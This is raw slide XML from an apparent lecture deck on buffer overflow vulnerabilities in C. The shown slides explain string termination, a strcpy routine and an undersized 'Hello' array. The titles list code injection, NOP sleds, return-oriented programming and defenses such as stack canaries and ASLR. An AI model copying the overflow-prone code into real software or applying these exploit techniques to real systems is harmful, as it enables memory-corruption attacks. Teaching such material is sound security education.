            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other string functions rely on terminal ‘\0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C strings are arrays of chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C doesn’t bounds-check arrays</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide by Bohn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2398419"/>
            <a:ext cx="4267201" cy="28244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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: copy t to s*/</a:t>
            </a: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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(char *s, char *t) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char c;</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0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        c = t[</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s[</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c;</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while (c != '\0');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5470175" y="5222856"/>
            <a:ext cx="6585649" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1603375" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>1 + 2 + 3 =	opportunity to create string</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>	longer than space allocated for it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56282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Sometimes Buffer Overflows are Accidental</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May go undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May cause unexpected behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May crash the program</a:t>
            </a:r>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide by Bohn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309964" y="1989537"/>
            <a:ext cx="4471354" cy="161031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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "Hello";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1928596" y="4439084"/>
            <a:ext cx="3234090" cy="1078030"/>
            <a:chOff x="8341092" y="2483318"/>
            <a:chExt cx="3234090" cy="1078030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8341092"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0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8880107"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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9419122"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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9958137"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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10497152"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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8341092"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H</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8880107"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e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9419122"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l</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9958137"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l</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10497152"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o</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11036167"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\0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202298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Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1737C494-6C59-9B45-9FC8-1B3B77FEB415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exceeding an array’s bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using more memory than allocated for the array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C does not check bounds – for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> element array, A[0], A[-1], and A[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] are all equally-legal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common buffer overflows involve strings allocated on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>aka, “stack smashing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#1 technical security vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#1 security vulnerability is human user</a:t>
            </a:r>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870885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34114</TotalTime>
  <Words>8011</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1354</Paragraphs>
  <Slides>50</Slides>
  <Notes>33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Lucida Console</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Buffer Overflow Vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Refresher on Memory Layout </vt:lpstr>
      <vt:lpstr>Refresher on Memory Layout</vt:lpstr>
      <vt:lpstr>Refresher on Memory Layout: non-const strings typically on stack</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>What is a Buffer Overflow?</vt:lpstr>
      <vt:lpstr>Sometimes Buffer Overflows are Accidental</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>gets() The Most Direct Way to Introduce Vulnerability</vt:lpstr>
      <vt:lpstr>Example Vulnerability</vt:lpstr>
      <vt:lpstr>Example Vulnerability</vt:lpstr>
      <vt:lpstr>Example Vulnerability: No buffer overflow</vt:lpstr>
      <vt:lpstr>Example Vulnerability: Off-by-one error</vt:lpstr>
      <vt:lpstr>Example Vulnerability: Maximum error w/o side-effect</vt:lpstr>
      <vt:lpstr>Example Vulnerability: Affecting Control Flow</vt:lpstr>
      <vt:lpstr>The Five Stages of Exploiting Buffer Overflow</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Let’s “Return” to a Different Function</vt:lpstr>
      <vt:lpstr>Let’s “Return” to a Different Function</vt:lpstr>
      <vt:lpstr>Creating the Exploit String</vt:lpstr>
      <vt:lpstr>Attacking the Vulnerability</vt:lpstr>
      <vt:lpstr>The Five Stages of Exploiting Buffer Overflow</vt:lpstr>
      <vt:lpstr>Injecting &amp; Executing New Code</vt:lpstr>
      <vt:lpstr>Where to Place New Code?</vt:lpstr>
      <vt:lpstr>Our attack</vt:lpstr>
      <vt:lpstr>Our attack: Option 1</vt:lpstr>
      <vt:lpstr>Our attack: Option 2</vt:lpstr>
      <vt:lpstr>Our Attack</vt:lpstr>
      <vt:lpstr>Injecting and Executing the Exploit String</vt:lpstr>
      <vt:lpstr>How’d That Happen?</vt:lpstr>
      <vt:lpstr>The Five Stages of Exploiting Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow Defenses</vt:lpstr>
      <vt:lpstr>Programmer-Level Protections Prevent Vulnerabilities</vt:lpstr>
      <vt:lpstr>Compiler-Level Protection Introduce Stack Canaries</vt:lpstr>
      <vt:lpstr>Code with &amp; without Stack Canary </vt:lpstr>
      <vt:lpstr>Detecting Buffer Overflow</vt:lpstr>
      <vt:lpstr>System-Level Protections 1. Randomized Stack Offset</vt:lpstr>
      <vt:lpstr>Counter-countermeasure NOP Sled</vt:lpstr>
      <vt:lpstr>Counter-countermeasure NOP Sled</vt:lpstr>
      <vt:lpstr>System-Level Protections 2. Non-Executable Stacks</vt:lpstr>
      <vt:lpstr>Counter-countermeasure Return-Oriented Programming (ROP)</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>ROP Concept</vt:lpstr>
      <vt:lpstr>Gadget Sources</vt:lpstr>
      <vt:lpstr>Gadget Sources</vt:lpstr>
      <vt:lpstr>ROP Injection String</vt:lpstr>
      <vt:lpstr>System-Level Protections 3. Address Space Layout Randomization (ASLR)</vt:lpstr>
      <vt:lpstr>Key Ideas</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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269</cp:revision>
  <cp:lastPrinted>2021-05-20T19:50:28Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-03T19:54:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-21T19:41:50Z</dcterms:modified>
</cp:coreProperties>
</file>